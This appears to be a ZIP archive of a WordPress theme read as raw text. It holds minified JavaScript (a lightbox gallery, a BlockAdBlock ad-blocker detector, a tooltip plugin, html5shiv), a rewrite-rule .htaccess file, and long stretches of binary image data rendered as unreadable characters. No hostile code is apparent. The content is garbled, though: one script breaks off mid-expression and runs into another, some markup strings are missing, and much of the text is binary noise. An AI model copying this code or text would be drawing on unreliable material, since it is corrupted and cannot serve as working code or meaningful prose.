    ',srcAction:"iframe_src",patterns:{youtube:{index:"youtube.com",id:"v=",src:"//www.youtube.com/embed/%id%?autoplay=1"},vimeo:{index:"vimeo.com/",id:"/",src:"//player.vimeo.com/video/%id%?autoplay=1"},gmaps:{index:"//maps.google.",src:"%id%&output=embed"}}},proto:{initIframe:function(){b.types.push(P),w("BeforeChange",function(a,b,c){b!==c&&(b===P?R():c===P&&R(!0))}),w(h+"."+P,function(){R()})},getIframe:function(c,d){var e=c.src,f=b.st.iframe;a.each(f.patterns,function(){return e.indexOf(this.index)>-1?(this.id&&(e="string"==typeof this.id?e.substr(e.lastIndexOf(this.id)+this.id.length,e.length):this.id.call(this,e)),e=this.src.replace("%id%",e),!1):void 0});var g={};return f.srcAction&&(g[f.srcAction]=e),b._parseMarkup(d,g,c),b.updateStatus("ready"),d}}});var S=function(a){var c=b.items.length;return a>c-1?a-c:0>a?c+a:a},T=function(a,b,c){return a.replace(/%curr%/gi,b+1).replace(/%total%/gi,c)};a.magnificPopup.registerModule("gallery",{options:{enabled:!1,arrowMarkup:'',preload:[0,2],navigateByImgClick:!0,arrows:!0,tPrev:"Previous (Left arrow key)",tNext:"Next (Right arrow key)",tCounter:"%curr% of %total%"},proto:{initGallery:function(){var c=b.st.gallery,e=".mfp-gallery";return b.direction=!0,c&&c.enabled?(f+=" mfp-gallery",w(m+e,function(){c.navigateByImgClick&&b.wrap.on("click"+e,".mfp-img",function(){return b.items.length>1?(b.next(),!1):void 0}),d.on("keydown"+e,function(a){37===a.keyCode?b.prev():39===a.keyCode&&b.next()})}),w("UpdateStatus"+e,function(a,c){c.text&&(c.text=T(c.text,b.currItem.index,b.items.length))}),w(l+e,function(a,d,e,f){var g=b.items.length;e.counter=g>1?T(c.tCounter,f.index,g):""}),w("BuildControls"+e,function(){if(b.items.length>1&&c.arrows&&!b.arrowLeft){var d=c.arrowMarkup,e=b.arrowLeft=a(d.replace(/%title%/gi,c.tPrev).replace(/%dir%/gi,"left")).addClass(s),f=b.arrowRight=a(d.replace(/%title%/gi,c.tNext).replace(/%dir%/gi,"right")).addClass(s);e.click(function(){b.prev()}),f.click(function(){b.next()}),b.container.append(e.add(f))}}),w(n+e,function(){b._preloadTimeout&&clearTimeout(b._preloadTimeout),b._preloadTimeout=setTimeout(function(){b.preloadNearbyImages(),b._preloadTimeout=null},16)}),void w(h+e,function(){d.off(e),b.wrap.off("click"+e),b.arrowRight=b.arrowLeft=null})):!1},next:function(){b.direction=!0,b.index=S(b.index+1),b.updateItemHTML()},prev:function(){b.direction=!1,b.index=S(b.index-1),b.updateItemHTML()},goTo:function(a){b.direction=a>=b.index,b.index=a,b.updateItemHTML()},preloadNearbyImages:function(){var a,c=b.st.gallery.preload,d=Math.min(c[0],b.items.length),e=Math.min(c[1],b.items.length);for(a=1;a<=(b.direction?e:d);a++)b._preloadItem(b.index+a);for(a=1;a<=(b.direction?d:e);a++)b._preloadItem(b.index-a)},_preloadItem:function(c){if(c=S(c),!b.items[c].preloaded){var d=b.items[c];d.parsed||(d=b.parseEl(c)),y("LazyLoad",d),"image"===d.type&&(d.img=a('').on("load.mfploader",function(){d.hasSize=!0}).on("error.mfploader",function(){d.hasSize=!0,d.loadError=!0,y("LazyLoadError",d)}).attr("src",d.src)),d.preloaded=!0}}}});var U="retina";a.magnificPopup.registerModule(U,{options:{replaceSrc:function(a){return a.src.replace(/\.\w+$/,function(a){return"@2x"+a})},ratio:1},proto:{initRetina:function(){if(window.devicePixelRatio>1){var a=b.st.retina,c=a.ratio;c=isNaN(c)?c():c,c>1&&(w("ImageHasSize."+U,function(a,b){b.img.css({"max-width":b.img[0].naturalWidth/c,width:"100%"})}),w("ElementParse."+U,function(b,d){d.src=a.replaceSrc(d,c)}))}}}}),A()});PK!Z4assets/js/detector.min.jsnu[;!function(t){var e=function(e){this._options={checkOnLoad:!1,resetOnEnd:!1,loopCheckTime:50,loopMaxNumber:5,baitClass:"pub_300x250 pub_300x250m pub_728x90 text-ad textAd text_ad text_ads text-ads text-ad-links",baitStyle:"width: 1px !important; height: 1px !important; position: absolute !important; left: -10000px !important; top: -1000px !important;",debug:!1},this._var={version:"3.2.1",bait:null,checking:!1,loop:null,loopNumber:0,event:{detected:[],notDetected:[]}},void 0!==e&&this.setOption(e);var o=this,i=function(){setTimeout(function(){!0===o._options.checkOnLoad&&(!0===o._options.debug&&o._log("onload->eventCallback","A check loading is launched"),null===o._var.bait&&o._creatBait(),setTimeout(function(){o.check()},1))},1)};void 0!==t.addEventListener?t.addEventListener("load",i,!1):t.attachEvent("onload",i)};e.prototype._options=null,e.prototype._var=null,e.prototype._bait=null,e.prototype._log=function(t,e){console.log("[BlockAdBlock]["+t+"] "+e)},e.prototype.setOption=function(t,e){if(void 0!==e){var o=t;(t={})[o]=e}for(var i in t)this._options[i]=t[i],!0===this._options.debug&&this._log("setOption",'The option "'+i+'" he was assigned to "'+t[i]+'"');return this},e.prototype._creatBait=function(){var e=document.createElement("div");e.setAttribute("class",this._options.baitClass),e.setAttribute("style",this._options.baitStyle),this._var.bait=t.document.body.appendChild(e),this._var.bait.offsetParent,this._var.bait.offsetHeight,this._var.bait.offsetLeft,this._var.bait.offsetTop,this._var.bait.offsetWidth,this._var.bait.clientHeight,this._var.bait.clientWidth,!0===this._options.debug&&this._log("_creatBait","Bait has been created")},e.prototype._destroyBait=function(){t.document.body.removeChild(this._var.bait),this._var.bait=null,!0===this._options.debug&&this._log("_destroyBait","Bait has been removed")},e.prototype.check=function(t){if(void 0===t&&(t=!0),!0===this._options.debug&&this._log("check","An audit was requested "+(!0===t?"with a":"without")+" loop"),!0===this._var.checking)return!0===this._options.debug&&this._log("check","A check was canceled because there is already an ongoing"),!1;this._var.checking=!0,null===this._var.bait&&this._creatBait();var e=this;return this._var.loopNumber=0,!0===t&&(this._var.loop=setInterval(function(){e._checkBait(t)},this._options.loopCheckTime)),setTimeout(function(){e._checkBait(t)},1),!0===this._options.debug&&this._log("check","A check is in progress ..."),!0},e.prototype._checkBait=function(e){var o=!1;if(null===this._var.bait&&this._creatBait(),null===t.document.body.getAttribute("abp")&&null!==this._var.bait.offsetParent&&0!=this._var.bait.offsetHeight&&0!=this._var.bait.offsetLeft&&0!=this._var.bait.offsetTop&&0!=this._var.bait.offsetWidth&&0!=this._var.bait.clientHeight&&0!=this._var.bait.clientWidth||(o=!0),void 0!==t.getComputedStyle){var i=t.getComputedStyle(this._var.bait,null);!i||"none"!=i.getPropertyValue("display")&&"hidden"!=i.getPropertyValue("visibility")||(o=!0)}!0===this._options.debug&&this._log("_checkBait","A check ("+(this._var.loopNumber+1)+"/"+this._options.loopMaxNumber+" ~"+(1+this._var.loopNumber*this._options.loopCheckTime)+"ms) was conducted and detection is "+(!0===o?"positive":"negative")),!0===e&&(this._var.loopNumber++,this._var.loopNumber>=this._options.loopMaxNumber&&this._stopLoop()),!0===o?(this._stopLoop(),this._destroyBait(),this.emitEvent(!0),!0===e&&(this._var.checking=!1)):null!==this._var.loop&&!1!==e||(this._destroyBait(),this.emitEvent(!1),!0===e&&(this._var.checking=!1))},e.prototype._stopLoop=function(t){clearInterval(this._var.loop),this._var.loop=null,this._var.loopNumber=0,!0===this._options.debug&&this._log("_stopLoop","A loop has been stopped")},e.prototype.emitEvent=function(t){!0===this._options.debug&&this._log("emitEvent","An event with a "+(!0===t?"positive":"negative")+" detection was called");var e=this._var.event[!0===t?"detected":"notDetected"];for(var o in e)!0===this._options.debug&&this._log("emitEvent","Call function "+(parseInt(o)+1)+"/"+e.length),e.hasOwnProperty(o)&&e[o]();return!0===this._options.resetOnEnd&&this.clearEvent(),this},e.prototype.clearEvent=function(){this._var.event.detected=[],this._var.event.notDetected=[],!0===this._options.debug&&this._log("clearEvent","The event list has been cleared")},e.prototype.on=function(t,e){return this._var.event[!0===t?"detected":"notDetected"].push(e),!0===this._options.debug&&this._log("on",'A type of event "'+(!0===t?"detected":"notDetected")+'" was added'),this},e.prototype.onDetected=function(t){return this.on(!0,t)},e.prototype.onNotDetected=function(t){return this.on(!1,t)},t.BlockAdBlock=e,void 0===t.blockAdBlock&&(t.blockAdBlock=new e({checkOnLoad:!0,resetOnEnd:!0}))}(window);PK!Wjassets/js/jquery.tipsy.min.jsnu[;!function(t){function e(t,e){return"function"==typeof t?t.call(e):t}function i(e,i){this.$element=t(e),this.options=i,this.enabled=!0}i.prototype={show:function(){var i=this.getTitle();if(i&&this.enabled){var s=this.tip();s.find(".tipsy-inner")[this.options.html?"html":"text"](i),s[0].className="tipsy",s.remove().css({top:0,left:0,visibility:"hidden",display:"block"}).prependTo(document.body);var n,o=t.extend({},this.$element.offset(),{width:this.$element[0].offsetWidth,height:this.$element[0].offsetHeight}),a=s[0].offsetWidth,l=s[0].offsetHeight,r=this.getGravity();switch(r.charAt(0)){case"n":n={top:o.top+o.height+this.options.offset,left:o.left+o.width/2-a/2};break;case"s":n={top:o.top-l-this.options.offset,left:o.left+o.width/2-a/2};break;case"e":n={top:o.top+o.height/2-l/2,left:o.left-a-this.options.offset};break;case"w":n={top:o.top+o.height/2-l/2,left:o.left+o.width+this.options.offset}}2==r.length&&("w"==r.charAt(1)?n.left=o.left+o.width/2-15:n.left=o.left+o.width/2-a+15),s.css(n).addClass("tipsy-"+r),s.find(".tipsy-arrow")[0].className="tipsy-arrow tipsy-arrow-"+r.charAt(0),this.options.className&&s.addClass(e(this.options.className,this.$element[0])),this.options.fade?s.stop().css({opacity:0,display:"block",visibility:"visible"}).animate({opacity:this.options.opacity}):s.css({visibility:"visible",opacity:this.options.opacity})}},hide:function(){this.options.fade?this.tip().stop().fadeOut(function(){t(this).remove()}):this.tip().remove()},fixTitle:function(){var t=this.$element;(t.attr("title")||"string"!=typeof t.attr("original-title"))&&t.attr("original-title",t.attr("title")||"").removeAttr("title")},getTitle:function(){var t,e=this.$element,i=this.options;return"string"==typeof(i=this.options).title?t=e.attr("title"==i.title?"original-title":i.title):"function"==typeof i.title&&(t=i.title.call(e[0])),(t=(""+t).replace(/(^\s*|\s*$)/,""))||i.fallback},getGravity:function(){this.$element,this.options;return this.$element.data("gravity")?this.$element.data("gravity"):e(this.options.gravity,this.$element[0])},tip:function(){return this.$tip||(this.$tip=t('
    ').html('
    '),this.$tip.data("tipsy-pointee",this.$element[0])),this.$tip},validate:function(){this.$element[0].parentNode||(this.hide(),this.$element=null,this.options=null)},enable:function(){this.enabled=!0},disable:function(){this.enabled=!1},toggleEnabled:function(){this.enabled=!this.enabled}},t.fn.rbTipsy=function(e){if(!0===e)return this.data("tipsy");if("string"==typeof e){var s=this.data("tipsy");return s&&s[e](),this}function n(s){var n=t.data(s,"tipsy");return n||(n=new i(s,t.fn.rbTipsy.elementOptions(s,e)),t.data(s,"tipsy",n)),n}if((e=t.extend({},t.fn.rbTipsy.defaults,e)).live||this.each(function(){n(this)}),"manual"!=e.trigger){var o=e.live?"live":"bind",a="hover"==e.trigger?"mouseenter":"focus",l="hover"==e.trigger?"mouseleave":"blur";this[o](a,function(){var t=n(this);t.hoverState="in",0==e.delayIn?t.show():setTimeout(function(){"in"==t.hoverState&&t.show()},e.delayIn)})[o](l,function(){var t=n(this);t.hoverState="out",0==e.delayOut?t.hide():setTimeout(function(){"out"==t.hoverState&&t.hide()},e.delayOut)})}return this},t.fn.rbTipsy.defaults={className:null,delayIn:0,delayOut:0,fade:!1,fallback:"",gravity:"n",html:!1,live:!1,offset:0,opacity:.8,title:"title",trigger:"hover"},t.fn.rbTipsy.revalidate=function(){t(".tipsy").each(function(){var e=t.data(this,"tipsy-pointee");e&&function(t){for(;t=t.parentNode;)if(t==document)return!0;return!1}(e)||t(this).remove()})},t.fn.rbTipsy.elementOptions=function(e,i){return t.metadata?t.extend({},i,t(e).metadata()):i},t.fn.rbTipsy.autoNS=function(){return t(this).offset().top>t(document).scrollTop()+t(window).height()/2?"s":"n"},t.fn.rbTipsy.autoWE=function(){return t(this).offset().left>t(document).scrollLeft()+t(window).width()/2?"e":"w"},t.fn.rbTipsy.autoBounds=function(e,i){return function(){var s={ns:i[0],ew:i.length>1&&i[1]},n=t(document).scrollTop()+e,o=t(document).scrollLeft()+e,a=t(this);return a.offset().top",d.insertBefore(c.lastChild,d.firstChild)}function d(){var a=t.elements;return"string"==typeof a?a.split(" "):a}function e(a,b){var c=t.elements;"string"!=typeof c&&(c=c.join(" ")),"string"!=typeof a&&(a=a.join(" ")),t.elements=c+" "+a,j(b)}function f(a){var b=s[a[q]];return b||(b={},r++,a[q]=r,s[r]=b),b}function g(a,c,d){if(c||(c=b),l)return c.createElement(a);d||(d=f(c));var e;return e=d.cache[a]?d.cache[a].cloneNode():p.test(a)?(d.cache[a]=d.createElem(a)).cloneNode():d.createElem(a),!e.canHaveChildren||o.test(a)||e.tagUrn?e:d.frag.appendChild(e)}function h(a,c){if(a||(a=b),l)return a.createDocumentFragment();c=c||f(a);for(var e=c.frag.cloneNode(),g=0,h=d(),i=h.length;i>g;g++)e.createElement(h[g]);return e}function i(a,b){b.cache||(b.cache={},b.createElem=a.createElement,b.createFrag=a.createDocumentFragment,b.frag=b.createFrag()),a.createElement=function(c){return t.shivMethods?g(c,a,b):b.createElem(c)},a.createDocumentFragment=Function("h,f","return function(){var n=f.cloneNode(),c=n.createElement;h.shivMethods&&("+d().join().replace(/[\w\-:]+/g,function(a){return b.createElem(a),b.frag.createElement(a),'c("'+a+'")'})+");return n}")(t,b.frag)}function j(a){a||(a=b);var d=f(a);return!t.shivCSS||k||d.hasCSS||(d.hasCSS=!!c(a,"article,aside,dialog,figcaption,figure,footer,header,hgroup,main,nav,section{display:block}mark{background:#FF0;color:#000}template{display:none}")),l||i(a,d),a}var k,l,m="3.7.3",n=a.html5||{},o=/^<|^(?:button|map|select|textarea|object|iframe|option|optgroup)$/i,p=/^(?:a|b|code|div|fieldset|h1|h2|h3|h4|h5|h6|i|label|li|ol|p|q|span|strong|style|table|tbody|td|th|tr|ul)$/i,q="_html5shiv",r=0,s={};!function(){try{var a=b.createElement("a");a.innerHTML="",k="hidden"in a,l=1==a.childNodes.length||function(){b.createElement("a");var a=b.createDocumentFragment();return"undefined"==typeof a.cloneNode||"undefined"==typeof a.createDocumentFragment||"undefined"==typeof a.createElement}()}catch(c){k=!0,l=!0}}();var t={elements:n.elements||"abbr article aside audio bdi canvas data datalist details dialog figcaption figure footer header hgroup main mark meter nav output picture progress section summary template time video",version:m,shivCSS:n.shivCSS!==!1,supportsUnknownElements:l,shivMethods:n.shivMethods!==!1,type:"default",shivDocument:j,createElement:g,createDocumentFragment:h,addElements:e};a.html5=t,j(b),"object"==typeof module&&module.exports&&(module.exports=t)}("undefined"!=typeof window?window:this,document);PK!.|assets/js/.htaccessnu[ Order allow,deny Deny from all Order allow,deny Allow from all RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] PK!assets/images/single-2.pngnu[PNG  IHDRPNtEXtSoftwareAdobe ImageReadyqe<niTXtXML:com.adobe.xmp IL&#@X aKst:~yyyEx<տ8::˲)omm$`0 i]ae3±r~~^w777^occhUggg'''_ X ,@Xnhm|o ИjhϣзX޿eW8Uewp홱 7Wva!,b+LtgggiiyEh8^]]UXXvNvpr XTw aa!,BX  a!,BX ,@X aa!,BX kkkwwwȡP_`eeţ3a!,BX  a!,BXP=$Ie3:V,+u}{B5]{Uϗ{\0#,BX Ufx<~~~~oGš (TQU1> ˋb)IdYrl_UXOOO'WUY¹˽2U1ߧSZKkƢSeў^𾸸Նj{8H|4 a!,BXzZ/#cYBWS| iXuD{zf, K/YB-i%4 a!,¢e,:%t59,밄 K/YB-i%4 a!,(O-\w"dsIENDB`PK!VmF3assets/images/list-2.jpgnu[ExifII*Duckydwhttp://ns.adobe.com/xap/1.0/ Adobedx  TW )iև8X!"&xC$B% ?t<4ɠJI1t<4ɠJI1t<4ɠJI1t<4ɠJI1t<4ɠJI1t<4ɠJI1t<4ɠJI1t<4ɠJI1t<4ɠJI1t<4ɠJI1t<4ɠJI1t<4ɠJI1t<4ɠ:]ps.GIU#]60PD="Kԑl8¨Ș;_m̹iYjueAQZWĠ/j>̯@<^՗D}k_x/ 2%{V_e|J(*#\Y~PTGֹ( qVU){.ӖcLrr^tLXBScmR<)rdtO4r9b.êjWRI+A4ݮd>%'ӪɏI`; /Ö"u^}"x޾/WE;kkT%M%hy ޡJ;!-GG%L 3\y_[e}*3M؄vh _rrG r>S Pd&PdL?.rpf@-~͌<|p?ehr/zMDhzMDhzMDhzMDhzMDhzMDhzMDhzMDhzMDhzMDhzMDhzMDhmTԬDd8Ē `\()x`eSV*[ZKN.[Zle!'ݬ*4Cu܅ܼf8DViI2-TrPj$IQaQ\?Ob sk00Ck-rXuQY-vJuQY-vJuQY-vJuQY-vJuQY-vJuQY-vJuQY-vJuQY-vJuQY-vJuQY-vJuQY-vJuQY-vJvM9Rs41T.1.$_'̡B/2)N$Ү쏌,{ Ȏ\nlfֹ@s{Ik6J E!~iw/1@Y D޽<%؈틆Ϯ0͘_;:SȯV?q2`~d=X<ɀzyc&!LՏC̘0V?q2`=SqsWfxU^]7s>vEz4v}imp!B^b$TR)RxFtJ6_EPa0^0uǖbZնYh 6[JS"S$Qt5TC=nZ+Egqli3LՍ6l@wu̹Ke&Th>XMtBE-.RENh# "c~2e9b^՗D}k_x/ 2%{V_e|J(*#\Y~PTGֹ(ڲs+PeAQZWĠ4CuYTj[NY0Qy2bZ8r N-)H`d=ɒy {Ik6J E!~iw/1@Y!xpM̷+c:uLRjeDc'o x87\CͷX<"Ǥ^F]qǤ^F]qǤ^F]qǤ^F]qǤ^F]qǤ^F]qǤ^F]qǤ^F]qǤ^F]qǤ^F]qǤ^F]qǤ^F]foNUM1]JL Jc I  |WPe1IbձeĴArYY6^b}͠D7Q}_]P`jdEa&-؅N+xEAF59" >16 <%ȼ)7XUd)7XUd)7XUd)7XUd)7XUd)7XUd)7XUd)7XUd)7XUd)7XUd)7XUd)7XUd:dӕ,LW3M1KH|?a+(DM*ȇ> c&!LՏC̘0V?q2`~d=X<ɀzyc&7;EvgE]5zۮ<3`\g~/7@Wh gߏ/ >f W/.( 0JEE"E'L\gJYTh] cXmP. O*zƝ8tMXm,- 1h{J<@1h{J<@1h{J<@1h{J<@1h{J<@1h{J<@1h{J<@1h{J<@1h{J<@1h{J<@1h{J<@1h{J<@1hˀPK!V&& assets/images/single-audio-1.pngnu[PNG  IHDRPNtEXtSoftwareAdobe ImageReadyqe<niTXtXML:com.adobe.xmp ZNIDATxMK*Q񔘂\E}Z7hKpfF~k<>|~~Al]#@X a-vfswwa^-$x>>o]]]]__|+ *c%; ;d΁>1Q4'ce0z} saϪpF 9caQ n7c|[uvÁ5МBJUր3?+,U\svދsxg,@X a‚sVgI\^^BZzj$JM"$Eo_axV5$(Y"PՑcrN2|*$f\dBX  a!,BX ,@X aa!,BX ISdvXUk4}Y)̰y*awgUi4#, BX ,@XAœfMtNNNzQĚRUQ^a53g,*IKY8U8oX#Jո6BX ;K]XBybYBom8cQl[û%tij,AX aug K8O,K-q²m5g,mrxN=[B4"T%4 a!,BX"6Ն8O,W',;|cqƢ>aK)wWR6dLI.Uv a!,¢, IJb ',VcqƢ>aٶK)wKû%tƔR5 , ݗj 3IENDB`PK!m>assets/images/sidebar-right.pngnu[PNG  IHDR5,J]gttEXtSoftwareAdobe ImageReadyqe<"iTXtXML:com.adobe.xmp JsIDATxٱ 0 DbbP;* :D2rS.sdfW۫q>|Ç>|Ç>|}'{z{`SIENDB`PK!ƴassets/images/sidebar-left.pngnu[PNG  IHDR5,J]gttEXtSoftwareAdobe ImageReadyqe<"iTXtXML:com.adobe.xmp ÃrIDATxٱ @ {DqDVOI;ED+\S]}s-h<{zB$Yވ︓Ç>|Ç>|Ç?}MN?i%;SIENDB`PK!Uw assets/images/single-video-4.pngnu[PNG  IHDRPNtEXtSoftwareAdobe ImageReadyqe<niTXtXML:com.adobe.xmp CIDATxM/+q[KMX4~ ۗ(Hl*,j(JDro"rŠyu-?3OښNj Fa!,,ph4L&֠>nlooVϱNOOL:NۭVxyy*kU`00VBBU{Rl( | a!,@X aa!,BX  a!,BX ,@X aa!,BX  a!,BX ,@X aa!,BX4"$I%dn͔%do-!;Nc  D _ߚNy^74FĔW0U*T a!,BX ,~YG崴Kxz<an!JuttQ ONNTUZ.XZU+BAUY{U#Š + ^fuxx>J/1M7Ʈ$kUTU-MS'#,;BX hf^__S-G`XQU5A/̏Vת& \ v,??0=5[ {UCB ,@X a‚~?ßwVkeeܷ^bs?UW"c1/UoթرɰVWWX_bXc,F)ex a1B+CBWVcc1?a9m5oYB;Θ\fChBX74%kA_IENDB`PK!vֿassets/images/list-3.jpgnu[ExifII*Duckydhttp://ns.adobe.com/xap/1.0/ Adobedu W 8h!1TԗXq2" ?NyvߘJZ8&wn-4VJRjz% B<{X<l{;ŠnCݜfWV-v4ݿESmvZi]UUU)rlj%EMVѶWR<;TNiEy~tNMӊyS$!D4!k~e۠D9Qyw/q@v`'lǛ%R1.̮(XFvK;(K:[{gGn՘(R&!m \i*'l*f7QzIm4U˩PI\i)!LD:u3I{U܂o oG5]&pU܂o oG5]&pU܂o oG5]&pU܂o oG5]&pSd fsN-,v\268{jTn+QgːP4=MҔiIńbHm65IPt-魂421ȍ)Ӕь$2Ӧĥ̚c} <֫Kk#!2$ʕ4HKG]20^Da oD-Wr"g:K2T8Z}J#Q8e &ӥtR G$Ƅ!B1Kn A/U^p/ V_@ z4[~1h%by9jflo\Gp\UIT#:Jcom`dXj6iM4M,6syw췹{t;h*/?v.(D-ݞh.Mh̺TtD{{T͕-Utcέ,/lg#4|U l5]U l5]U l5]j3+VܦKԫz!Np>`}T4\=ԥRDљ܀?orwT^~/j]P[8v[ܽ4C ڗrf"poy%%ixl_u OWѴۅ>MѬrՋ= ⩕51?ntqJJ,@4qJJ,@]ܹ9rff7on*6_P8Tsj9M fS$H藤cBD-/W<`^oрuzʿF*W<`^oрuzʿFPK!]\שassets/images/grid-1.jpgnu[ExifII*Duckydwhttp://ns.adobe.com/xap/1.0/ Adobedz   TՖW ֧"8Xxh!#H2$ ?YDO Rx&R6jcQ2T:͠Lm,ǎe'hfG='WeAqW@=^ݗ|k^%{v_txS?{)@28Q}}_/go:;.cՕBw>eRP~8VTSVS8 gO"%?hUX / ^ـ ]?g@g|p8_g̪JU2ʞ;2 g@LqiD֭ʸ EATKP0= VU lI@jUYSyOUZL>)?m=ZՠWb(/zf3ǷRt1ʡ~;͟2( Tʿ*{)ʫ@)DqIP KȪK0e+MScjDPbr UDk:.63X-Z2nAFEdNԞHwC1WGT7Tzo`y]<0tw ۰X'j.I1Q?kj`| +":/ǎMfB.Ҕʻ|TbIEP<%'T5YXhD"M&i>1LwӫkeBu kzRpTNRVJVK1 9F<7pܗuO>]y-wGEꎖ4PiA$3v {6BC [0u{y߉ޟE]<0twCU,J֩^/E\7z֣첆.vr\zLC ].끬2Ÿj=8E>J[ OSRq CӑZםr Z1f0 ˔HW LgTY(Yc5*$‹=OI 8qc9c7xnAFEdNԞHwC1WGT7Tzo`y]<0twpkiktSf T"F3Q#h8" b;[.A> cB9nn#D9nn#D9nn#D9nn#D9nn#D9nn#D9nn#DHfonWMQaR$Fg ( `u$E"i&ɲj`E28GJ ^k` .hrU^NǛNKR䞖IRaWjT@S4H7b1潁nn#D9nn#D9nn#D9nn#D9nn#D9nn#D9nn#DKPxj,LN3< p>#$)B| 2qD31,7C@MYĵ-Ը34%]'.h*DН9: œEYM.Lqc"F}=:Ei=i=i=s85[4JhnU2c*]OPB= 5uu6*|3ɟ1^<}לn5\-7hWt-7hWt-7hWt-7hWt-7hWt-7hWt-7hWt$=ɷ+XjzMSC^_bXFJK &Y:;3u ,DT:ׅ-˲Uve%QQ:-Lrz$!JW'*RTr*.ޑxo8ZqiB,qiB,qiB,qiB,qiB,qiB,qiB,.FE+̳4:LJd$3M p##8/K)ʼn>NhxHϾ^]o7]`4"%Ɲfy]."9CYIJR80Q2id ]/3װ0"/#Mie5(#Mie5(#Mie5( 8J_ZХFLj] ^LJ KMG(P8PDh%Af*+/T_x`iQ}rEʊ (*+/T_x=$~@F-F#@[ֵ'1\(u8^:}"Ffaַk#L=sz +MS. ȘDι)m{h*q7)M5%مlO{ʛ,oz\PI@9݈;2[8ly?Q*+/T_x`iQ}rEʊ (*+/T_x:-%wkDd}TLλPNLwU!E论wݡ lo<΋rnfjEJwH@ @{&jy\3gQ5"vQ:NF|qcQ\`iQ}rEʊ ( ژ$Lrlj"d Adobed   TVWh X)!68H1Q"$%# ?Q,~a'hf; ?@5K1ߨIZYDO Rw&jcQ0TŠL$-,~a'hf; ?@5K1ߨIZYDO Rw&jcQ0TŠL$-,~a'hf; ?@5K1ߨIZYDO Rw&jcQ0TŠL$-,~a'h c\/3"QP"((DF*xe~'6}#7o9K1Z2c?ˀe,ǜ }jY8.p-\)f<[SRy֧p oOK1Z2c?ˀe,ǜ }jY8.p-\Z5jWՂH16K)#Њy1Ѹ6㟹{$h-鮥i(h-鮥i(h-鮥i(h-鮥i(h-鮥i(h-鮥i(h-鮥i( !qk+F§vt򞴍?3 27IlȠ$)zD>2 G{guPWj/% "kF۶5ur$21"Ky $TCQSoRB7ƽq8lv]u7'-/lض{K4x{b,p gA7'-/lض{K4x{b,p gA7'-/lض{K4=kJʧ0e|#D[.'DL0N*1WY4ȼQD4XK"__,_:_f5vrX "ZV!MdOS 5.JQHh˪&TJ$.V)Z/&:qk y/}ovmw݀]`/}ovmw݀]`/}ov6!jibf5DIV4X˳d9@en1P.zgb9wP@//wՀxQ~//zQ9,}Q/:Xfi[&PUBdT[P)5ψϨ{4z"z Ҙ ѸlHϹעy},mЪn豷cBzpݎ v;*,mЪn豷cBzpݎ v;*,mЪn豷cBzp/R/КJdRT[Mt#m#̴XKÉ-W8D㧝V"X !EtE(jED@sMh zZqEff%ys/$r򒙃hibJt2TXE8s Cc40d;*Y-ЩfnOcBp= id;*Y-ЩfnOcBp˾(h:Ƀ%F19Qa5ky꫼2'bup0N"__XT/;ӚhizU8h2k99 #TIAfsF5 OE \kut`d=whTNkUQM/u:Y5*̎*yIN:hePH:xHû#ń}ǘ@(;0$x3jxr D/Z" Xǿa<fbw}Xj$?gE/RctZX4Z $k3 b ?(nGEV;Xll+Z y;mw݀ jHL%PJ$)rlYZ2G',4HR6n1l2v;rט^Ҕʻn*]1$BҬ\W"S|;iյ!:y}k8TptECĊp5㉗3CČߵ< c,ǜ }jY8.p-\)f<[SRy֧p oOK1Z2c?ˀe,ǜ }jY8.p-\)f<[SRy֧p j֪um_V "ƴz_#,tGtB+ǟFxۮ+~?GGGGGGG(Ŭ3[ Ӊڲj'Oz48/ S<ޚy%"DTN=1q5@ ]>(U&-<Ͼ0yJY;ށ';xgﵷ`}}G{m;knQ[v۰w݀>ﵷ`}=T!u̺NTȍmeOso0eO2pۛˮ+K:y`%_ K^_KwD6~-րj4o;1J)NK^/=@4n.bDp^ykucmveQ/''imTK@GfUr{ٕDomveQ/''imTK@GfUr{ٕDomveQ/''imTK@ =`[6Nl%YJD7*sSrri&SU#6B,ֽ1.k/bw}X`(;0ۿm[)NtOjW[H<8n'ܗa N. qw%HӋ.@>]vKr](퀦bUކA2,}8e!ךyuo` g%D  q^dLB!J2 0!ɒl;4(˩#&ΌF&Jc[vZK:y`%_ K^_KwD6~6b&OԀw;1MΤTL^/")@*n,.Cpw]}cykCvz/(fK9ٸ+Gg{nJDnvz/(fK9ٸ+Gg{n)Q i>M3-b;KSqRܤqm\ˉ dD&/Y eB~1O;N*acGIPNiTᣄɬG'cS%eQ\7=7q>ӏ1t['ݡR8UFJ-4%dԫ2:@ 'a8ѡ\EK:y`YĐiIi`kP'g.(1$1<Xv+ak.1LwӫkeBu1p xy"`;?51H1dD mLw& kjc0c[S䉃@ژ$L2y"`;?51H1dD mLw& kjc0c[S䉃@ژ$L2y"`;?51H1dD mLw& kjc0c[S䉃@ژ$L2y"` \PK!C5 zzassets/images/classic-1.jpgnu[ExifII*Duckydwhttp://ns.adobe.com/xap/1.0/ Adobedt Wg 8Hx"2#՗X ?'p Ot 5RQ-s/e™ϧ%JIcj/n>n>n>n>n>n>n>n>n>n>n>n>n>nž1h0գTH5#K7le%VR҅f\dgdUk^Ou{XSiEkVʸDB_U1'p 3߸'֭p<}bDN@gMqOݭZ* y }V (8O~,ZU  ;Qq6Y?vh 4A%[/ w??m=~jWhK_ 4@D<{dՠ2o@h x)"@saꄎZ;b*RARKGl 1PReSTDG9* ̏ FC0?Rq@Q/k _KD'rcaY|;mR+ARGcf$1UJf)R2y G$JYhSˬHshz;TSy<QcxE*,}/1@eE( pR>T_2JTX^)Q~bʋw */PQcxE*,}/1@eE( pR>T_2JyN`a^V9hKLl:ymM:}kza1Y+5k(P}S5Z]($l 7'č@34ܟ6fFr|H nO3M#`fi>$l 7'čꠕS^,W)W"lE5+Pơ"\Hi׹+DG0؞{_kuu{P[ d-Ue%zH4624T'R*uA{ŃGXֱv5hxDb-3:\1]k.L WeuZtK+:`:%iAְΠXpvZgPuDb-3:\1]k.L WeuZtK+:`:%iAְ=X{)NK+b, b'@~w(R*{E$G1c'p TDetZt%RTCU$`%G4Hp~3KK۲:}`:%i>ְvΟkXq;vZgOD-3\Nݖk.'nLetZtK۲:}`:%i>ְvΟkXq;vZgOD-3\Nݖk8P 6^'%eCIHYW',VU:1{W) m4+ď6G#J(qMX5+AR#F}螊+{]cuyBٚnO3M#`fi>$l 7'č@34ܟ6fFr|H nO3M#`fi>$lMR`ҹJ&dsYJ,)(q2 &urW OE 5ֺƺ=N@%ml5y]4BQ#VZ 